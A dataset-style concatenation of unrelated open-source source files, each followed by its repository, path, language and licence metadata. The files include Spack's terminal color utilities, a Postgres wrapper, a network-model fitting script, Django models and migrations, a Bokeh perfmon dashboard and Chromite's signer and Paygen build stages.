raise ValueError('Invalid color setting: %s' % when)
return when
def get_color_when():
"""Return whether commands should print color or not."""
if _force_color is not None:
return _force_color
return sys.stdout.isatty()
def set_color_when(when):
"""Set when color should be applied. Options are:
* True or 'always': always print color
* False or 'never': never print color
* None or 'auto': only print color if sys.stdout is a tty.
"""
global _force_color
_force_color = _color_when_value(when)
@contextmanager
def color_when(value):
"""Context manager to temporarily use a particular color setting."""
    # Remember the current setting so it can be restored after the block.
    old_value = _force_color
set_color_when(value)
yield
set_color_when(old_value)
class match_to_ansi(object):
def __init__(self, color=True):
self.color = _color_when_value(color)
def escape(self, s):
"""Returns a TTY escape sequence for a color"""
if self.color:
return "\033[%sm" % s
else:
return ''
def __call__(self, match):
"""Convert a match object generated by ``color_re`` into an ansi
color code. This can be used as a handler in ``re.sub``.
"""
style, color, text = match.groups()
m = match.group(0)
if m == '@@':
return '@'
elif m == '@.':
return self.escape(0)
elif m == '@':
raise ColorParseError("Incomplete color format: '%s' in %s"
% (m, match.string))
string = styles[style]
if color:
if color not in colors:
raise ColorParseError("invalid color specifier: '%s' in '%s'"
% (color, match.string))
string += ';' + str(colors[color])
colored_text = ''
if text:
colored_text = text + self.escape(0)
return self.escape(string) + colored_text
def colorize(string, **kwargs):
"""Replace all color expressions in a string with ANSI control codes.
Args:
string (str): The string to replace
Returns:
str: The filtered string
Keyword Arguments:
color (bool): If False, output will be plain text without control
codes, for output to non-console devices.
"""
color = _color_when_value(kwargs.get('color', get_color_when()))
return re.sub(color_re, match_to_ansi(color), string)
def clen(string):
"""Return the length of a string, excluding ansi color sequences."""
return len(re.sub(r'\033[^m]*m', '', string))
def cextra(string):
""""Length of extra color characters in a string"""
return len(''.join(re.findall(r'\033[^m]*m', string)))
def cwrite(string, stream=sys.stdout, color=None):
"""Replace all color expressions in string with ANSI control
codes and write the result to the stream. If color is
       False, this will write plain text with no color. If True,
then it will always write colored output. If not supplied,
then it will be set based on stream.isatty().
"""
if color is None:
color = get_color_when()
stream.write(colorize(string, color=color))
def cprint(string, stream=sys.stdout, color=None):
"""Same as cwrite, but writes a trailing newline to the stream."""
cwrite(string + "\n", stream, color)
def cescape(string):
"""Replace all @ with @@ in the string provided."""
return str(string).replace('@', '@@')
class ColorStream(object):
def __init__(self, stream, color=None):
self._stream = stream
self._color = color
def write(self, string, **kwargs):
raw = kwargs.get('raw', False)
raw_write = getattr(self._stream, 'write')
color = self._color
if self._color is None:
if raw:
color = True
else:
color = get_color_when()
raw_write(colorize(string, color=color))
def writelines(self, sequence, **kwargs):
raw = kwargs.get('raw', False)
for string in sequence:
            self.write(string, raw=raw)
|
skosukhin/spack
|
lib/spack/llnl/util/tty/color.py
|
Python
|
lgpl-2.1
| 9,290 | 0 |
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import root
import bct
eps = np.finfo(float).eps
def pij_wij(x,y,t):
xij = np.outer(x,x)
yij = np.outer(y,y)
pij = xij*((yij)**t)/(1.0+xij*(yij**t) - (yij**t))
wij = (t*(xij-1.0)*(yij**t))/((1.0 + xij*(yij**t) - (yij**t) )) - 1.0/(np.log(np.abs(yij+eps)))
return pij,wij
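# Interpretation of the closed forms above (following the cEWRGt naming used in
# this script): pij is the model probability that nodes i and j are linked in the
# network thresholded at t, and wij is the corresponding expected edge weight;
# both depend only on the per-node multipliers x and y. The solver below fits x
# and y so that the expected degrees and strengths match the observed k and s.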
def eq(z, t, ki, si):
nz = len(z)
n = nz//2
pij,wij = pij_wij(z[0:n],z[n:],t) # x is first half, y is second half
#print(pij.shape,wij.shape,ki.shape,si.shape)
#pij -= pij.di
np.fill_diagonal(pij,0)
np.fill_diagonal(wij,0)
delta_pij = np.sum(pij,axis=0) - ki
delta_wij = np.sum(wij,axis=0) - si
return np.concatenate([delta_pij, delta_wij])
def factor_model(ci,T,eta,mu, correlation=False):
N = len(ci) # number of nodes, length of membership vector,
# Initialize the observations vector a TxN matrix of NaNs,
Y = np.ones([T,N])*np.nan
# Fill the identical observations in the maximally correlated subsets,
for c in np.unique(ci):
i = np.where(ci==c)[0]
Y[:,i] = np.kron(np.ones((1,(ci==c).sum())),np.random.randn(T,1))
# Add local noise beta on each time-series,
Y += eta*np.random.randn(T,N)
# Add global signal mu that correlates globally each time series,
Y += mu*np.kron(np.ones((1,N)),np.random.randn(T,1))
from scipy.stats import zscore
Y = zscore(Y)
if correlation:
C = np.corrcoef(Y.T)
np.fill_diagonal(C,0)
else:
C = np.cov(Y.T)
return C
def inference_cEWRGt(W, thresh):
k = (W>0).sum(axis=0) # degrees
s = W.sum(axis=0) # strength
#from scipy.optimize import root
from scipy.optimize import least_squares
x0=np.concatenate([k,s])*1E-4 # initial solution
# Initialize least squares from previous solution
sollm = least_squares(lambda v: eq(v,thresh,k,s),
x0=x0,
bounds= (0,np.inf),
method='trf',
ftol=1E-8,
xtol=1E-8,
verbose=1)
sollm = root(lambda z: eq(z,thresh,k,s),
x0=x0,
method='lm',
options={'xtol':1E-30,'gtol':1E-30,'ftol':1E-30},
tol=1E-6)
#print('Final cost', sollm['cost'])
sollm = sollm['x']
n2 = int(len(sollm)//2)
x,y = sollm[0:n2],sollm[n2:]
return x, y
def plot_results(W,x,y,thresh):
pij,wij = pij_wij(x,y,thresh) # compute the output from the optimization result
plt.figure(figsize=(12,8))
plt.subplot(2,3,1)
im = plt.imshow(pij)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('$p_{ij}$')
plt.subplot(2,3,2)
im = plt.imshow(wij)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('$<w_{ij}>$')
plt.subplot(2,3,3)
im = plt.imshow(W)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('empirical matrix')
plt.subplot(2,3,4)
plt.plot((W>0).sum(axis=0),pij.sum(axis=0), 'b.')
plt.plot(np.linspace(0,pij.sum(axis=0).max()),np.linspace(0,pij.sum(axis=0).max()),'r-')
plt.grid(True)
plt.axis('equal')
plt.title('$k_i - <k_i>$')
plt.ylabel('model')
plt.xlabel('empirical')
#plt.xlim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
#plt.ylim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
plt.subplot(2,3,5)
plt.plot(W.sum(axis=0),wij.sum(axis=0), 'b.')
plt.plot(np.linspace(0,wij.sum(axis=0).max()),np.linspace(0,wij.sum(axis=0).max()),'r-')
plt.title('$ s_i - <s_i>$')
plt.axis('equal')
#plt.xlim([0,wij.sum(axis=0).max()])
#plt.ylim([0,wij.sum(axis=0).max()])
plt.grid(True)
plt.ylabel('model')
plt.xlabel('empirical')
plt.tight_layout()
plt.show()
if __name__=='__main__':
thresh = 0.2 # threshold
T = 200 # number of time points to sample
eta = 3.0 # localnoise
mu = 1.0 # globalnoise
C = np.arctanh(factor_model([1]*40 + [2]*40 + [3]*30, T, eta, mu, True))
At = bct.threshold_absolute(C, thresh)
n=len(At)
k = (At>0).sum(axis=0)
s = At.sum(axis=0)
x,y = inference_cEWRGt(At, thresh)
plot_results(At, x, y, thresh)
|
CarloNicolini/CarloNicolini.github.io
|
sections/science/_posts/example_cEWRG.py
|
Python
|
mit
| 4,329 | 0.026565 |
from configparser import ConfigParser
import psycopg2
class Postgres(object):
def __init__(self, db_name):
filename = 'database.ini'
section = 'postgresql'
parser = ConfigParser()
parser.read(filename)
self.db = {}
if parser.has_section(section):
self.db['database'] = db_name
params = parser.items(section)
for param in params:
self.db[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
def connect(self):
self.conn = None
try:
self.conn = psycopg2.connect(**self.db)
self.cur = self.conn.cursor()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def close(self):
self.conn.close()
def execute(self, sql, params = ()):
self.cur.execute(sql, params)
self.conn.commit()
def get_version(self):
self.connect()
self.cur.execute('SELECT version()')
version = self.cur.fetchone()
self.close()
return version
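if __name__ == '__main__':
    # Minimal usage sketch: assumes a database.ini next to this script with a
    # [postgresql] section (host, user, password, ...); the database name
    # 'testdb' below is purely illustrative.
    pg = Postgres('testdb')
    print(pg.get_version())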
|
ICOS-Carbon-Portal/data
|
src/main/python/mongo-to-pg/Postgres.py
|
Python
|
gpl-3.0
| 1,006 | 0.033797 |
import io
import json
import os
import subprocess
import sys
import unittest
from os.path import join, abspath, dirname
sys.path.append('..')
from python_driver import __version__, get_processor_instance
from python_driver.requestprocessor import (
Request, Response, RequestProcessorJSON, InBuffer, EmptyCodeException)
from typing import Dict, Any, List, AnyStr, Optional, Iterator, cast
CURDIR = abspath(dirname(__file__))
# Disabled until I update the new module with typing
# class TestTypeCheck(unittest.TestCase):
# def test_10_check(self) -> None:
# prevdir = os.getcwd()
# try:
# os.chdir(dirname(CURDIR))
# srcdir = abspath(join(dirname(CURDIR), 'python_driver', '*'))
# self.assertEqual(subprocess.call(['test/typecheck.sh', srcdir], shell=True), 0)
# finally:
# os.chdir(prevdir)
class TestPythonDriverBase(unittest.TestCase):
def _restart_data(self, format_: str='json') -> None:
assert format_ == 'json'
with open(join(CURDIR, 'data', 'helloworld.py')) as f:
testcode = f.read()
self.data = Request({
'filepath': 'test.py',
'action': 'ParseAST',
'content': testcode,
'language': 'python',
})
bufferclass = io.StringIO if format_ == 'json' else io.BytesIO
# This will mock the python_driver stdin
self.sendbuffer = bufferclass()
# This will mock the python_driver stdout
self.recvbuffer = bufferclass()
@staticmethod
def _extract_docs(inbuffer: InBuffer) -> Iterator[Response]:
"""
This generator will read the inbuffer yielding the JSON
docs when it finds the ending mark
"""
line: str
for line in inbuffer.readlines():
yield json.loads(line)
def _loadResults(self, format_: str) -> List[Response]:
"""Read all msgs from the recvbuffer"""
self.recvbuffer.seek(0)
res: List[Response] = []
res = [doc for doc in self._extract_docs(self.recvbuffer)]
return res
class Test10ProcessRequestFunc(TestPythonDriverBase):
def _add_to_buffer(self, count: int, format_: str) -> None:
"""Add count test msgs to the sendbuffer"""
for i in range(count):
msg = ''
msg = json.dumps(self.data, ensure_ascii=False) + '\n'
self.sendbuffer.write(msg)
self.sendbuffer.flush()
def _send_receive(self, nummsgs: int, outformat: str='json',
dataupdate: Optional[Dict[AnyStr, Any]]=None,
restart_data: bool=True) -> List[Response]:
if restart_data:
self._restart_data(outformat)
if dataupdate:
self.data.update(dataupdate)
self._add_to_buffer(nummsgs, outformat)
self.sendbuffer.seek(0)
processor, _ = get_processor_instance(
outformat,
custom_outbuffer=self.recvbuffer,
custom_inbuffer=self.sendbuffer
)
processor.process_requests(self.sendbuffer)
return self._loadResults(outformat)
def _check_reply_dict(self, response: Response, has_errors: bool=False) -> None:
self.assertIsInstance(response, dict)
status = response.get('status')
if has_errors:
assert status in ('error', 'fatal')
errors = response.get('errors', list)
self.assertIsInstance(errors, list)
self.assertGreater(len(errors), 0)
else:
self.assertEqual(status, 'ok')
self._check_AST_dict(response)
language_version = response['metadata'].get('language_version', -1)
assert str(language_version) in ('2', '3')
def _check_AST_dict(self, response: Response) -> None:
self.assertIsNotNone(response)
assert 'ast' in response
self.assertIsInstance(response['ast'], dict)
root_key = list(response['ast'].keys())[0]
assert root_key
for key in ('ast_type', 'body'):
assert key in response['ast'][root_key]
self.assertIsInstance(response['ast'][root_key]['body'], list)
for item in response['ast'][root_key]['body']:
for key in ('ast_type', 'lineno', 'col_offset'):
assert key in item
def test_010_normal_json(self) -> None:
replies = self._send_receive(1, 'json')
self.assertEqual(len(replies), 1)
self._check_reply_dict(replies[0])
def test_020_normal_json_many(self) -> None:
replies = self._send_receive(100, 'json')
self.assertEqual(len(replies), 100)
for reply in replies:
self._check_reply_dict(reply)
def test_030_error_print(self) -> None:
wrongcode = 'wtf lol'
replies = self._send_receive(1, 'json', {'content': wrongcode})
self.assertEqual(len(replies), 1)
ast = replies[0].get('ast')
self.assertIsNone(ast)
self._check_reply_dict(replies[0], has_errors=True)
# Check that it still alive
self._restart_data()
replies = self._send_receive(1, 'json')
self.assertEqual(len(replies), 1)
def test_040_broken_json(self) -> None:
self._restart_data('json')
brokendata = json.dumps(self.data, ensure_ascii=False)[:-30]
self.sendbuffer.write(brokendata)
self.sendbuffer.flush()
reply = self._send_receive(1, 'json', restart_data=False)[0]
self.assertEqual(reply['status'], 'fatal')
self.assertEqual(len(reply['errors']), 1)
class Test20ReqProcMethods(TestPythonDriverBase):
def test_10_send_response_json(self) -> None:
self._restart_data('json')
processor = RequestProcessorJSON(self.recvbuffer)
processor._send_response(cast(Response, self.data))
res = self._loadResults('json')
self.assertEqual(len(res), 1)
self.assertDictEqual(self.data, res[0])
# process request already tested with TestPythonDriverBase
def test_20_return_error(self) -> None:
self._restart_data('json')
processor = RequestProcessorJSON(self.recvbuffer)
processor.errors = ['test error']
processor._return_error('test.py', 'fatal')
res = self._loadResults('json')
self.assertEqual(len(res), 1)
self.assertDictEqual(res[0] , {'driver': 'python23:%s' % __version__,
'errors': ['test error'],
'filepath': 'test.py',
'ast': None,
'status': 'fatal'})
if __name__ == '__main__':
unittest.main()
|
juanjux/python-driver
|
native/python_package/test/test_python_driver.py
|
Python
|
gpl-3.0
| 6,751 | 0.003555 |
# -*- coding: utf-8 -*-
"""Factories to help in tests."""
from factory import PostGenerationMethodCall, Sequence
from factory.alchemy import SQLAlchemyModelFactory
from authmgr.database import db
from authmgr.user.models import User
class BaseFactory(SQLAlchemyModelFactory):
"""Base factory."""
class Meta:
"""Factory configuration."""
abstract = True
sqlalchemy_session = db.session
class UserFactory(BaseFactory):
"""User factory."""
username = Sequence(lambda n: 'user{0}'.format(n))
email = Sequence(lambda n: 'user{0}@example.com'.format(n))
password = PostGenerationMethodCall('set_password', 'example')
active = True
class Meta:
"""Factory configuration."""
model = User
|
bcarroll/authmgr
|
authmgr/tests/factories.py
|
Python
|
bsd-3-clause
| 761 | 0 |
###############################################################################
# Name: txtutil.py #
# Purpose: Text Utilities. #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2009 Cody Precord <staff@editra.org> #
# Licence: wxWindows Licence #
###############################################################################
"""
Editra Business Model Library: Text Utilities
Utility functions for managing and working with text.
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: txtutil.py 62571 2009-11-08 17:53:27Z CJP $"
__revision__ = "$Revision: 62571 $"
__all__ = [ 'IsUnicode', ]
#-----------------------------------------------------------------------------#
# Imports
import types
#-----------------------------------------------------------------------------#
def IsUnicode(txt):
"""Is the given string a unicode string
@param txt: object
@return: bool
"""
return isinstance(txt, types.UnicodeType)
|
163gal/Time-Line
|
libs/wx/tools/Editra/src/ebmlib/txtutil.py
|
Python
|
gpl-3.0
| 1,195 | 0.003347 |
def on_square():
pass
def total_after():
pass
|
rootulp/xpython
|
exercises/grains/grains.py
|
Python
|
mit
| 56 | 0 |
# -*- coding: utf-8 -*-
import user
import inscription
import notes
import util
import stage
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
anaslamaizi/Projet-ODOO
|
__init__.py
|
Python
|
artistic-2.0
| 160 | 0.00625 |
print("test\n")
|
heavywatal/practice-py
|
Kazuki526/test.py
|
Python
|
mit
| 16 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-01 12:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0030_github_user'),
]
operations = [
migrations.AddField(
model_name='linkedin_user',
name='number_all_repos',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos1',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos2',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos3',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='technology1',
field=models.CharField(default='', max_length=50),
),
migrations.AddField(
model_name='linkedin_user',
name='technology2',
field=models.CharField(default='', max_length=50),
),
migrations.AddField(
model_name='linkedin_user',
name='technology3',
field=models.CharField(default='', max_length=50),
),
]
|
hiezust/teask
|
website/migrations/0031_auto_20170601_1502.py
|
Python
|
gpl-3.0
| 1,475 | 0 |
from django.db import models
class BranchManager(models.Manager):
def get_branch(self, user, project):
try:
return self.get(user=user, project=project, active=True)
except:
return self.create(user=user, project=project, active=True)
class Branch(models.Model):
user = models.ForeignKey('auth.User')
project = models.ForeignKey('projects.Project')
active = models.BooleanField(default=True)
pushed = models.BooleanField(default=False)
title = models.TextField(default='')
comment = models.TextField(default='')
objects = BranchManager()
def __unicode__(self):
return "Branch of %s by %s (%s)" % (self.project, self.user, self.pk)
|
alex/readthedocs.org
|
readthedocs/editor/models.py
|
Python
|
mit
| 726 | 0.00551 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class NavConfig(AppConfig):
name = 'cms.nav'
verbose_name = _('Navigation')
|
HurtowniaPixeli/pixelcms-server
|
cms/nav/apps.py
|
Python
|
mit
| 176 | 0 |
import sys
import os
import cv2
from keras.models import load_model
sys.path.append("/Users/alexpapiu/Documents/Conv/OpenCV_CNN")
from webcam_cnn_pipeline import return_compiled_model_2, real_time_pred
model_name = sys.argv[1]
w = 1.5*144
h = 2*144
#keep track of all labels:
all_labels = {"model_hand":["A", "B", "C", "D", "No Hand"],
"basic_model":["happy", "sad", "normal", "incredulous"],
"model_face":["happy", "sad", "normal"]}
labelz = dict(enumerate(all_labels[model_name]))
os.chdir("/Users/alexpapiu/Documents/Data/OpenCV_CNN")
model = return_compiled_model_2(input_shape = (3,int(h),int(w)),
num_class = len(labelz))
model.load_weights(model_name)
#open a new video:
cp = cv2.VideoCapture(0)
cp.set(3, w)
cp.set(4, h)
real_time_pred(model, labelz, cp = cp, nframes = 10000)
|
apapiu/live_cnn
|
live_cnn/reusing_model.py
|
Python
|
apache-2.0
| 861 | 0.019744 |
# pandas and numpy for data manipulation
import pandas as pd
import numpy as np
import sqlite3
from bokeh.plotting import Figure
from bokeh.models import (
CategoricalColorMapper,
HoverTool,
ColumnDataSource,
Panel,
FuncTickFormatter,
SingleIntervalTicker,
LinearAxis,
)
from bokeh.models import Legend
from bokeh.models.widgets import (
CheckboxGroup,
Slider,
RangeSlider,
Tabs,
CheckboxButtonGroup,
TableColumn,
DataTable,
Select,
)
from bokeh.layouts import column, row, WidgetBox
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.colors as colors
def perfmon_tab(db):
def make_dataset(perfmon_list):
newdf = perfmon[perfmon_list]
# Convert dataframe to column data source
return ColumnDataSource(newdf)
def make_plot(src):
# Blank plot with correct labels
p = Figure(
plot_width=1024,
plot_height=768,
x_axis_type="datetime",
title="perfmon",
output_backend="webgl",
)
cm = plt.get_cmap("gist_rainbow")
numlines = len(perfmon.columns)
mypal = [cm(1.0 * i / numlines) for i in range(numlines)]
mypal = list(map(lambda x: colors.rgb2hex(x), mypal))
col = 0
legenditems = []
for key in src.data.keys():
if key == "datetime":
continue
l = key + " "
col = col + 1
cline = p.line(
perfmon.index.values,
perfmon[key],
line_width=1,
alpha=0.8,
color=mypal[col],
)
legenditems += [(key, [cline])]
p.legend.click_policy = "hide"
legend = Legend(items=legenditems, location=(0, 0))
p.add_layout(legend, "below")
return p
def update(attr, old, new):
perfmons_to_plot = [
perfmon_selection.labels[i] for i in perfmon_selection.active
]
new_src = make_dataset(perfmons_to_plot)
plot = make_plot(new_src)
        # TODO: crude hack for lack of a better solution so far
layout.children[1] = plot
# get data from DB, setup index
cur = db.cursor()
cur.execute(
"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ["perfmon"]
)
if len(cur.fetchall()) == 0:
return None
perfmon = pd.read_sql_query("select * from perfmon", db)
perfmon.index = pd.to_datetime(perfmon["datetime"])
perfmon = perfmon.drop(["datetime"], axis=1)
perfmon.index.name = "datetime"
perfmon_selection = CheckboxGroup(
labels=list(perfmon.columns),
active=[0, 5],
width=300,
height=800,
sizing_mode="fixed",
)
perfmon_list = [perfmon_selection.labels[i] for i in perfmon_selection.active]
src = make_dataset(perfmon_list)
plot = make_plot(src)
perfmon_selection.on_change("active", update)
controls = WidgetBox(perfmon_selection, width=300, height=800, sizing_mode="fixed")
layout = row(controls, plot)
tab = Panel(child=layout, title="perfmon")
return tab
|
murrayo/yape
|
yapesrv/scripts/perfmon_tab.py
|
Python
|
mit
| 3,197 | 0.001877 |
# Copyright (c) Meta Platforms, Inc. and affiliates.
# Copyright (c) Mercurial Contributors.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from testutil.dott import feature, sh, testtmp # noqa: F401
feature.require(["symlink"])
# https://bz.mercurial-scm.org/1438
sh % "hg init repo"
sh % "cd repo"
sh % "ln -s foo link"
sh % "hg add link"
sh % "hg ci -mbad link"
sh % "hg rm link"
sh % "hg ci -mok"
sh % "hg diff -g -r '0:1'" > "bad.patch"
sh % "hg up 0" == "1 files updated, 0 files merged, 0 files removed, 0 files unresolved"
sh % "hg import --no-commit bad.patch" == "applying bad.patch"
sh % "hg status" == r"""
R link
? bad.patch"""
|
facebookexperimental/eden
|
eden/scm/tests/test-issue1438-t.py
|
Python
|
gpl-2.0
| 789 | 0.001267 |
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Module containing the various stages that a builder runs."""
import json
import logging
import os
from chromite.cbuildbot import commands
from chromite.cbuildbot import failures_lib
from chromite.cbuildbot import cbuildbot_run
from chromite.cbuildbot.stages import artifact_stages
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import timeout_util
class InvalidTestConditionException(Exception):
"""Raised when pre-conditions for a test aren't met."""
class SignerTestStage(artifact_stages.ArchivingStage):
"""Run signer related tests."""
option_name = 'tests'
config_name = 'signer_tests'
# If the signer tests take longer than 30 minutes, abort. They usually take
# five minutes to run.
SIGNER_TEST_TIMEOUT = 1800
def PerformStage(self):
if not self.archive_stage.WaitForRecoveryImage():
raise InvalidTestConditionException('Missing recovery image.')
with timeout_util.Timeout(self.SIGNER_TEST_TIMEOUT):
commands.RunSignerTests(self._build_root, self._current_board)
class SignerResultsTimeout(failures_lib.StepFailure):
"""The signer did not produce any results inside the expected time."""
class SignerFailure(failures_lib.StepFailure):
"""The signer returned an error result."""
class MissingInstructionException(failures_lib.StepFailure):
"""We didn't receive the list of signing instructions PushImage uploaded."""
class MalformedResultsException(failures_lib.StepFailure):
"""The Signer results aren't formatted as we expect."""
class PaygenSigningRequirementsError(failures_lib.StepFailure):
"""Paygen stage can't run if signing failed."""
class PaygenCrostoolsNotAvailableError(failures_lib.StepFailure):
"""Paygen stage can't run if signing failed."""
class PaygenNoPaygenConfigForBoard(failures_lib.StepFailure):
"""Paygen can't run with a release.conf config for the board."""
class PaygenStage(artifact_stages.ArchivingStage):
"""Stage that generates release payloads.
If this stage is created with a 'channels' argument, it can run
  independently. Otherwise, it's dependent on values queued up by
the ArchiveStage (push_image).
"""
option_name = 'paygen'
config_name = 'paygen'
# Poll for new results every 30 seconds.
SIGNING_PERIOD = 30
# Timeout for PushImage to finish uploading images. 2 hours in seconds.
PUSHIMAGE_TIMEOUT = 2 * 60 * 60
# Timeout for the signing process. 2 hours in seconds.
SIGNING_TIMEOUT = 2 * 60 * 60
FINISHED = 'finished'
def __init__(self, builder_run, board, archive_stage, channels=None,
**kwargs):
"""Init that accepts the channels argument, if present.
Args:
builder_run: See builder_run on ArchivingStage.
board: See board on ArchivingStage.
archive_stage: See archive_stage on ArchivingStage.
channels: Explicit list of channels to generate payloads for.
If empty, will instead wait on values from push_image.
Channels is normally None in release builds, and normally set
for trybot 'payloads' builds.
"""
super(PaygenStage, self).__init__(builder_run, board, archive_stage,
**kwargs)
self.signing_results = {}
self.channels = channels
def _HandleStageException(self, exc_info):
"""Override and don't set status to FAIL but FORGIVEN instead."""
exc_type, exc_value, _exc_tb = exc_info
# If Paygen fails to find anything needed in release.conf, treat it
# as a warning, not a failure. This is common during new board bring up.
if issubclass(exc_type, PaygenNoPaygenConfigForBoard):
return self._HandleExceptionAsWarning(exc_info)
# If the exception is a TestLabFailure that means we couldn't schedule the
# test. We don't fail the build for that. We do the CompoundFailure dance,
# because that's how we'll get failures from background processes returned
# to us.
if (issubclass(exc_type, failures_lib.TestLabFailure) or
(issubclass(exc_type, failures_lib.CompoundFailure) and
exc_value.MatchesFailureType(failures_lib.TestLabFailure))):
return self._HandleExceptionAsWarning(exc_info)
return super(PaygenStage, self)._HandleStageException(exc_info)
def _JsonFromUrl(self, gs_ctx, url):
"""Fetch a GS Url, and parse it as Json.
Args:
gs_ctx: GS Context.
url: Url to fetch and parse.
Returns:
None if the Url doesn't exist.
Parsed Json structure if it did.
Raises:
MalformedResultsException if it failed to parse.
"""
try:
signer_txt = gs_ctx.Cat(url).output
except gs.GSNoSuchKey:
return None
try:
return json.loads(signer_txt)
except ValueError:
# We should never see malformed Json, even for intermediate statuses.
raise MalformedResultsException(signer_txt)
def _SigningStatusFromJson(self, signer_json):
"""Extract a signing status from a signer result Json DOM.
Args:
signer_json: The parsed json status from a signer operation.
Returns:
string with a simple status: 'passed', 'failed', 'downloading', etc,
or '' if the json doesn't contain a status.
"""
return (signer_json or {}).get('status', {}).get('status', '')
def _CheckForResults(self, gs_ctx, instruction_urls_per_channel,
channel_notifier):
"""timeout_util.WaitForSuccess func to check a list of signer results.
Args:
gs_ctx: Google Storage Context.
instruction_urls_per_channel: Urls of the signer result files
we're expecting.
channel_notifier: BackgroundTaskRunner into which we push channels for
processing.
Returns:
Number of results not yet collected.
"""
COMPLETED_STATUS = ('passed', 'failed')
# Assume we are done, then try to prove otherwise.
results_completed = True
for channel in instruction_urls_per_channel.keys():
self.signing_results.setdefault(channel, {})
if (len(self.signing_results[channel]) ==
len(instruction_urls_per_channel[channel])):
continue
for url in instruction_urls_per_channel[channel]:
# Convert from instructions URL to instructions result URL.
url += '.json'
# We already have a result for this URL.
if url in self.signing_results[channel]:
continue
signer_json = self._JsonFromUrl(gs_ctx, url)
if self._SigningStatusFromJson(signer_json) in COMPLETED_STATUS:
# If we find a completed result, remember it.
self.signing_results[channel][url] = signer_json
# If we don't have full results for this channel, we aren't done
# waiting.
if (len(self.signing_results[channel]) !=
len(instruction_urls_per_channel[channel])):
results_completed = False
continue
# If we reach here, the channel has just been completed for the first
# time.
# If all results 'passed' the channel was successfully signed.
channel_success = True
for signer_result in self.signing_results[channel].values():
if self._SigningStatusFromJson(signer_result) != 'passed':
channel_success = False
# If we successfully completed the channel, inform paygen.
if channel_success:
channel_notifier(channel)
return results_completed
def _WaitForPushImage(self):
"""Block until push_image data is ready.
Returns:
Push_image results, expected to be of the form:
{ 'channel': ['gs://instruction_uri1', 'gs://signer_instruction_uri2'] }
Raises:
MissingInstructionException: If push_image sent us an error, or timed out.
"""
try:
instruction_urls_per_channel = self.board_runattrs.GetParallel(
'instruction_urls_per_channel', timeout=self.PUSHIMAGE_TIMEOUT)
except cbuildbot_run.AttrTimeoutError:
instruction_urls_per_channel = None
# A value of None signals an error, either in PushImage, or a timeout.
if instruction_urls_per_channel is None:
raise MissingInstructionException('PushImage results not available.')
return instruction_urls_per_channel
def _WaitForSigningResults(self,
instruction_urls_per_channel,
channel_notifier):
"""Do the work of waiting for signer results and logging them.
Args:
instruction_urls_per_channel: push_image data (see _WaitForPushImage).
channel_notifier: BackgroundTaskRunner into which we push channels for
processing.
Raises:
ValueError: If the signer result isn't valid json.
RunCommandError: If we are unable to download signer results.
"""
gs_ctx = gs.GSContext(dry_run=self._run.debug)
try:
cros_build_lib.Info('Waiting for signer results.')
timeout_util.WaitForReturnTrue(
self._CheckForResults,
func_args=(gs_ctx, instruction_urls_per_channel, channel_notifier),
timeout=self.SIGNING_TIMEOUT, period=self.SIGNING_PERIOD)
except timeout_util.TimeoutError:
msg = 'Image signing timed out.'
cros_build_lib.Error(msg)
cros_build_lib.PrintBuildbotStepText(msg)
raise SignerResultsTimeout(msg)
# Log all signer results, then handle any signing failures.
failures = []
for url_results in self.signing_results.values():
for url, signer_result in url_results.iteritems():
result_description = os.path.basename(url)
cros_build_lib.PrintBuildbotStepText(result_description)
cros_build_lib.Info('Received results for: %s', result_description)
cros_build_lib.Info(json.dumps(signer_result, indent=4))
status = self._SigningStatusFromJson(signer_result)
if status != 'passed':
failures.append(result_description)
cros_build_lib.Error('Signing failed for: %s', result_description)
if failures:
cros_build_lib.Error('Failure summary:')
for failure in failures:
cros_build_lib.Error(' %s', failure)
raise SignerFailure(failures)
def PerformStage(self):
"""Do the work of generating our release payloads."""
# Convert to release tools naming for boards.
board = self._current_board.replace('_', '-')
version = self._run.attrs.release_tag
assert version, "We can't generate payloads without a release_tag."
logging.info("Generating payloads for: %s, %s", board, version)
# Test to see if the current board has a Paygen configuration. We do
    # this here, not in the sub-process, so we don't have to pass back a
# failure reason.
try:
from crostools.lib import paygen_build_lib
paygen_build_lib.ValidateBoardConfig(board)
except paygen_build_lib.BoardNotConfigured:
raise PaygenNoPaygenConfigForBoard(
'No release.conf entry was found for board %s. Get a TPM to fix.' %
board)
except ImportError:
raise PaygenCrostoolsNotAvailableError()
with parallel.BackgroundTaskRunner(self._RunPaygenInProcess) as per_channel:
def channel_notifier(channel):
per_channel.put((channel, board, version, self._run.debug,
self._run.config.paygen_skip_testing,
self._run.config.paygen_skip_delta_payloads))
if self.channels:
logging.info("Using explicit channels: %s", self.channels)
# If we have an explicit list of channels, use it.
for channel in self.channels:
channel_notifier(channel)
else:
instruction_urls_per_channel = self._WaitForPushImage()
self._WaitForSigningResults(instruction_urls_per_channel,
channel_notifier)
